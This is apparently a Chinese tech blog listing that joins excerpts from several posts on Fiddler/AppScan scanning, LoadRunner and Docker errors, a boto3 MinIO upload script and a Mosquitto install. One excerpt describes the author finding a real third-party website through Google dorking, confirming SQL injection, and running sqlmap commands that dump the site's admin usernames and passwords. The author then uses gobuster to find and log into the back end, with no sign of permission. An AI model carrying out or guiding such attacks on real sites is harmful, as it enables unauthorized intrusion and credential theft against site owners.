组合拳:Fiddler+Postman+AppScan,搞定C/S端软件漏洞扫描
时隔3个月,今天来更新一篇个人觉得很有意义的文章,为什么说是这篇内容比较有意义呢?主要有以下几点: 1、关于此问题的文章全网基本上没有,大部分说的都是通过Appscan+Profixer对手机端App测试进行描述,缺少对C/S端的教学; 2、解决了近期项目上的问题; 3、文章+1、也希望能够为以后遇到此问题的朋友们提供一种新的解决方式。 废话不多说,开始正事...
echo '
除了LoadRunner自带的代理录制脚本的方式,还有一种更为方便的方式就是通过抓包工具获取测试比较,使用WireShark抓包的方式已经说过了,这次就来换另一款工具:Fiddler 最新版的Fiddler全名叫“Fiddler EveryWhere”,如果没有最新版用老版的也不影响(个人推荐新版,新版增加了更好用的接口调试功能)。除了用到Fiddler这款...
今天在准备进入容器时发现提示了“OCI runtime exec failed: exec failed: unable to start container process: exec: bash: executable file not found in $PATH: unknown” 根据提示能看到缺少bash工具导致的,那就安装下bash工具吧 虚机...
问题描述 在使用loadrunner 12录制脚本结束点击停止生成脚本时发现没有发现脚本,而是提示了图示上的错误信息The recorded script contains no steps 问题发生原因 原因在于go君每次在录制前都会对Recording Options-Network-Mapping and Filtering中的网络捕获方式(Captu...
以往在练习sql注入漏洞的时候都是通过搭建靶站的方式进行的,靶站的东西再怎么反复练习也就那么回事了,要是真想有个效果还得来点实际的! 闲来无事上google再翻一翻,以前也翻过很多次,无奈技术菜没有找到什么适合我这种菜鸟水平的站来测试一波,真正的大佬都是个站就日的,不像我这种菜鸡,测试个网站还得东翻翻西找找…按照以往的方式还是用goole hacker的方式进行;因为以前找的站结构都是asp.net+win+iis架构的,对这个算是比较熟悉,所以这次用的语法还是这一套,输入hacker语法一顿向后翻页,前几页的不用想了,估计都被玩遍了 找了个网站进入后查看产品获取到链接地址:http://www.xxxxx.cn/show.asp?id=14 加个‘符号看看回显信息,发现返回了错误,再试试and 1 = 1 和 1 = 2看下回显,确认是带有sql注入漏洞了 因为水平菜,暂时还不能通过sql语句拼接的方式达到最终目的,所以只能用sqlmap工具一波流了… 获取数据库信息 sqlmap -u http://www.xxxx.cn/show.asp?id=14%20and%201%20=%201 --dbs 验证数据库为Microsoft Access 获取数据库表 sqlmap -u http://www.xxxxx.cn/show.asp?id=14%20and%201%20=%201 --batch -D Microsoft Access –tables 获取表属性 sqlmap -u http://www.xxxx.cn/show.asp?id=14%20and%201%20=%201 --batch -D Microsoft Access –T admin --columns 获取表数据 sqlmap -u http://www.xxxx.cn/show.asp?id=14%20and%201%20=%201 --batch -D Microsoft Access –T admin –C username,password –dump 获取系统后台登录地址 后台通过gobuster工具获取后登录 看下了以往的日志,发现该网站从N年前就一直被别人攻,但是好像网站管理人员并不对此上心(也有可能此网站已经被弃用了),导致现在还有不断的访问日志产生
最近的项目踩坑,留此记录以备后用。 import boto3 from botocore.exceptions import NoCredentialsError # MinIO服务器的配置信息 minio_endpoint = '地址信息' # 例如 'localhost:9000' access_key = 'access_key信息' secret_key = 'secret_key信息' bucket_name = 'nmsjpt' file_path = 'D:\\minio\\doc11-test.docx' # 本地文件路径 object_name = 'uploadFile/150622001234/ReportForm/1506220012340000001/doc11-test.docx' # 上传到MinIO后的文件名 # 创建一个boto3客户端 s3_client = boto3.client( 's3', endpoint_url=f'http://{minio_endpoint}', aws_access_key_id=access_key, aws_secret_access_key=secret_key ) try: # 上传文件 s3_client.upload_file(file_path, bucket_name, object_name) print(f'文件 {file_path} 成功上传到 {bucket_name}/{object_name}') except FileNotFoundError: print(f'文件 {file_path} 未找到') except NoCredentialsError: print('凭证错误,请检查你的 Access Key 和 Secret Key') except Exception as e: print(f'上传文件时发生错误: {e}')
安装Mosquitto: sudo yum install epel-release sudo yum install mosquitto 启动Mosquitto服务 sudo systemctl start mosquitto 设置Mosquitto开机自启动 sudo systemctl enable mosquitto 测试Mosquitto服务 先订阅一个mqtt服务 mosquitto_sub -h localhost -t testtopic 发送订阅信息 mosquitto_pub -h localhost -t testtopic -m "hello,mqtt" 然后,就可以看到发送的消息收到了。